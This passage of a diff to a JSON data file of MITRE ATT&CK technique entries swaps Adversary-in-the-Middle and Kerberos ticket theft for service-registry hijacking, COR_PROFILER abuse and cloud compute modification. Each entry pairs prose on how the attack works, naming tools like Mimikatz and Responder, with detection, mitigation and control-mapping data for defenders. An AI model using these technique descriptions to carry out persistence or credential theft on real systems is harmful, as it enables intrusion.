+        "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [
-            "2.6",
             "4.1",
             "4.7",
-            "5.1",
             "5.3",
             "5.4",
-            "5.5",
             "6.1",
             "6.2",
-            "6.4",
-            "6.5",
             "6.8",
-            "12.2",
+            "16.13",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
             "AC-2",
-            "AC-20",
             "AC-3",
+            "AC-4",
             "AC-5",
             "AC-6",
-            "AC-7",
-            "CA-7",
+            "CA-8",
             "CM-2",
             "CM-5",
             "CM-6",
-            "CM-7",
             "IA-2",
-            "IA-5",
-            "SC-39",
-            "SI-4",
-            "SI-7"
+            "RA-5",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.29523809523809524,
-            "mitigation_score": 0.5636363636363636
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1557",
-        "name": "Adversary-in-the-Middle",
-        "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.",
-        "url": "https://attack.mitre.org/techniques/T1557",
+        "tid": "T1574.011",
+        "name": "Hijack Execution Flow: Services Registry Permissions Weakness",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)",
+        "url": "https://attack.mitre.org/techniques/T1574/011",
         "tactics": [
-            "Collection",
-            "Credential Access"
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
+        "detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Service: Service Creation",
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Service: Service Metadata",
             "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1557.001",
-                "name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay",
-                "url": "https://attack.mitre.org/techniques/T1557/001",
-                "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)",
-                "detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1557.002",
-                "name": "Adversary-in-the-Middle: ARP Cache Poisoning",
-                "url": "https://attack.mitre.org/techniques/T1557/002",
-                "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n",
-                "detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             }
         ],
+        "cumulative_score": 0.1380952380952381,
+        "adjusted_score": 0.1380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-5"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1574.012",
+        "name": "Hijack Execution Flow: COR_PROFILER",
+        "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
+        "url": "https://attack.mitre.org/techniques/T1574/012",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
-            },
-            {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1035",
-                "name": "Limit Access to Resource Over Network",
-                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1035"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.772201521904762,
-        "adjusted_score": 0.772201521904762,
+        "cumulative_score": 0.27142857142857146,
+        "adjusted_score": 0.27142857142857146,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "3.12",
+            "2.5",
+            "2.6",
             "4.1",
-            "4.2",
-            "4.4",
-            "4.6",
-            "4.8",
-            "7.6",
-            "7.7",
-            "12.2",
-            "12.8",
-            "13.3",
-            "13.4",
-            "13.8",
-            "14.2",
-            "14.6",
-            "16.8",
-            "18.2",
-            "18.3",
-            "18.5",
-            "16.10",
-            "3.10"
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
-            "AC-20",
+            "AC-2",
             "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
+            "AC-5",
+            "AC-6",
+            "CM-5",
             "CM-7",
-            "CM-8",
-            "RA-5",
-            "SC-23",
-            "SC-4",
-            "SC-46",
-            "SC-7",
-            "SC-8",
+            "IA-2",
             "SI-10",
-            "SI-12",
-            "SI-15",
-            "SI-3",
-            "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.46190476190476193,
-            "mitigation_score": 0.8181818181818182,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.3,
-        "prevalence_score": 0.01029676
+        "hardware_coverage": false
     },
     {
-        "tid": "T1558",
-        "name": "Steal or Forge Kerberos Tickets",
-        "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n",
-        "url": "https://attack.mitre.org/techniques/T1558",
+        "tid": "T1578",
+        "name": "Modify Cloud Compute Infrastructure",
+        "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
+        "url": "https://attack.mitre.org/techniques/T1578",
         "tactics": [
-            "Credential Access"
+            "Defense Evasion"
         ],
-        "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.",
+        "detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Credential Request",
-            "Command: Command Execution",
-            "File: File Access",
-            "Logon Session: Logon Session Metadata"
+            "Instance: Instance Creation",
+            "Instance: Instance Deletion",
+            "Instance: Instance Modification",
+            "Instance: Instance Start",
+            "Instance: Instance Stop",
+            "Snapshot: Snapshot Creation",
+            "Snapshot: Snapshot Deletion",
+            "Snapshot: Snapshot Modification",
+            "Volume: Volume Creation",
+            "Volume: Volume Deletion",
+            "Volume: Volume Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1558.001",
-                "name": "Steal or Forge Kerberos Tickets: Golden Ticket",
-                "url": "https://attack.mitre.org/techniques/T1558/001",
-                "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.",
-                "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
-                "mitigations": [
-                    {
-                        "mid": "M1015",
-                        "name": "Active Directory Configuration",
-                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1015"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1558.002",
-                "name": "Steal or Forge Kerberos Tickets: Silver Ticket",
-                "url": "https://attack.mitre.org/techniques/T1558/002",
-                "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
-                "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+                "tid": "T1578.001",
+                "name": "Modify Cloud Compute Infrastructure: Create Snapshot",
+                "url": "https://attack.mitre.org/techniques/T1578/001",
+                "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
+                "detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)",
                 "mitigations": [
                     {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
